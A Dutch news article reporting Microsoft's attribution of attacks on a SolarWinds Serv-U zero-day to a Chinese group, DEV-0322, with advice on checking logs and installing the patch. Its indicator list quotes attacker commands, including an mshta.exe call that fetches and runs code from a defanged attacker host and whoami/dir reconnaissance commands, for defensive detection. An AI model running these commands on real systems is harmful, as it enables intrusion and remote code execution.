Beheer

Security
hack

Microsoft: Chinese hackers zitten achter nieuwe SolarWinds-aanval

'Chinese hackers richten pijlen op Amerikaanse defensie-industrie.'

14 juli 2021

'Chinese hackers richten pijlen op Amerikaanse defensie-industrie.'

De hackers die het nieuw ontdekte SolarWinds-gat misbruiken, behoren naar alle waarschijnlijkheid tot een Chinese hackersgroep. Dat stelt Microsoft op basis van eigen onderzoek. Onderzoekers van het bedrijf ontdekten het nieuwe probleem in de software van SolarWinds en maakten daar melding van. Inmiddels is een patch beschikbaar.

SolarWinds bracht afgelopen maandag een patch uit voor een nieuw gevonden gat in zijn Serv-U Managed File Transfer- en Serv-U Secure FTP-producten. De kwetsbaarheid is op afstand te misbruiken en laat aanvallers met diepgaande rechten eigen code uitvoeren op het onderliggende systeem. Volgens SolarWinds kan een inbreker zo programma's installeren, data bekijken, veranderen en wissen, en programma's draaien. Het gat wordt al actief misbruikt.

De zeroday werd ontdekt door beveiligingsonderzoekers van Microsoft, dat nu meer informatie geeft over het probleem. Microsoft zegt er redelijk zeker van te zijn dat de groep die het gat misbruikt onderdeel uitmaakt van de hackergroep 'DEV-0322'. DEV staat voor "development group", een term die wordt gebruikt voor nog niet-geïdentificeerde aanvalsgroepen. Iedere DEV-groep krijgt zijn eigen unieke nummer, zodat deze gevolgd kan worden.

Volgens Microsoft komt DEV-0322 uit China en gebruiken ze commerciële VPN-oplossingen en gecompromitteerde routers van consumenten bij hun aanvallen. De groep heeft volgens Microsoft tot nu toe de Amerikaanse Defensie-industrie en softwarebedrijven als doelwit gehad. 

Advies: onderzoek logs

Microsoft beschrijft verder hoe gebruikers kunnen zien of er een aanvalspoging is gedaan. Daarvoor moeten gebruikers het Serv-U-logbestand DebugSocketLog.txt bekijken en zoeken naar een melding als "C0000005; CSUSSHSocket::ProcessReceive". Deze melding kan aanduiden dat er een aanvalspoging is gedaan, maar kan ook om andere redenen opduiken. Mocht de melding gevonden worden, dan adviseert Microsoft echter sowieso om de logs verder te onderzoeken op signalen van misbruik. Het gaat om de volgende indicatoren:

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp
  • The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > “./Client/Common/redacted.txt”
  • cmd.exe /c dir > “.\Client\Common\redacted.txt”
  • cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

SolarWinds heeft maandag al een patch (HF2) uitgebracht voor de kwetsbaarheid. Die hotfix is beschikbaar in het klantportaal voor organisaties die een onderhoudscontract bij SolarWinds hebben. Wie dat niet heeft, krijgt het advies om een ticket in te dienen bij de klantenservice. Het dringende advies is om de hotfix meteen te installeren. 

Reactie toevoegen
De inhoud van dit veld is privé en zal niet openbaar worden gemaakt.